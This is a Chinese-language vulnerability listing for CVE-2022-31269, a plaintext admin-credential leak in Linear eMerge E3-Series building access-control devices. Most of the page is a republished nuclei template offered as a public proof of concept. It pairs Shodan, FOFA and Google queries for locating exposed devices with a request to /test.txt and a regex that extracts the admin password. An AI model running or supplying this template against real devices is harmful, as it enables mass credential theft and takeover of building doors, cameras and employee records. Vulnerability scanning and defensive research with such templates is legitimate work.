CVE-2022-31269: Linear eMerge E3-Series - Information Disclosure

日期: 2025-08-01 | 影响软件: Linear eMerge E3-Series | POC: 已公开

漏洞描述

Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.

PoC代码[已公开]

id: CVE-2022-31269

info:
  name: Linear eMerge E3-Series - Information Disclosure
  author: For3stCo1d
  severity: high
  description: |
    Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
    - https://www.nortekcontrol.com/access-control/
    - https://eg.linkedin.com/in/omar-1-hashem
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2022-31269
    cwe-id: CWE-798
    epss-score: 0.81013
    epss-percentile: 0.99122
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - http.title:"Linear eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol

http:
  - method: GET
    path:
      - "{{BaseURL}}/test.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ID="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - text/plain

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - Password='(.+?)'
# digest: 4a0a00473045022028d10fc9b960eb8e5072c804bed6464c4eb37efcb6a5c3d2f410e716e475ff5f022100d7f07a5cd3f63d94934f8372c67455d844e1f09946c1776287647d6fb5f1eaef:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31269.yaml

相关漏洞推荐